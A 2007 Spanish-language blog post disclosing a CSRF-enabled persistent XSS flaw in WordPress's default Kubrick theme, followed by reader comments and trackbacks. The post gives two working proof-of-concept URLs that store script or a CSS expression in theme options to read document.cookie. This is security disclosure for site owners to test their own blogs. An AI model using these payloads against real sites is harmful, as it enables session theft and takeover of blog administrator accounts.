XSS en el tema Kubrick de Wordpress
Por: alex | 27 Abril 2007 | Ver comentarios |
Kubrick, tema por omisión de Wordpress, es vulnerable a ataques CSRF, esto tiene como consecuencia que un atacante pueda almacenar HTML arbitrario en sus opciones, si alguno de ustedes usa este tema, puede probar los siguientes ejemplos (o variantes) para determinar si su blog se ve afectado o no por este problema.
XSS persistente que sólo funciona en IE http://localhost/wp/wp-admin/themes.php?page=functions.php&action=save&fontcolor=expression(alert(document.cookie)) XSS persistente, funciona en todos los navegadores: http://localhost/wp/wp-admin/themes.php?page=functions.php&action=save&headerimage='--></style><script>alert(document.cookie)</script>
Es muy probable que otros temas también sean vulnerables a este tipo de ataques, por lo cual, si vuestro blog les importa, deben tener cuidado con los plugins y temas que instalan o usan.
Carlos Mauricio
27 de Abril de 2007, 12:48:04 pm
Hola
te interesa un intercambio de enlaces¿?
mi blog es http://www.dttodo.com
si te interesa pon un enlace a mi blog con el nombre de Dttodo y yo pondre un enlace al tuyo con el nombre que me digas mediante un comentario en mi blog.
Saludos,
LUIS
27 de Abril de 2007, 01:52:47 pm
pero solo afecta eso si eres administrador, por que eh probado ese script en varios blog wordpress y todos me redireccionan a su login
alex
27 de Abril de 2007, 02:03:31 pm
#1: Este no es el lugar adecuado para hablar de estos temas, hubiera sido mejor que me enviaras un mail; sobre el intercambio de enlaces, nuestras páginas no tienen nada que ver, así que dudo mucho que vaya a servirle a alguno de los dos.
Luis: Obviamente que si, pero como indico en el texto de la entrada, esto se puede aprovechar usando CSRF.
7 nuevos problemas de seguridad en WordPress en Buayacorp - Diseño y Programación
31 de Julio de 2007, 06:33:17 pm
[…] el tema por omisión de WordPress (Kubrick) son vulnerables. Aunque no lo probé, me parece que es parecido al que reporté hace […]
MicroZulo » Blog Archive » 7 nuevos problemas de seguridad en WordPress
1 de Agosto de 2007, 08:37:23 am
[…] omisión de WordPress (Kubrick) son vulnerables. Aunque no lo probé, me parece que es parecido al que reporté hace […]
El primer gusano para wordpress | Ubuntu Linux, PHP, AJAX, Software Libre | Blog XYOX
10 de Mayo de 2008, 12:49:17 am
[…] el tema por omisión de WordPress (Kubrick) son vulnerables. Aunque no lo probé, me parece que es parecido al que reporté hace […]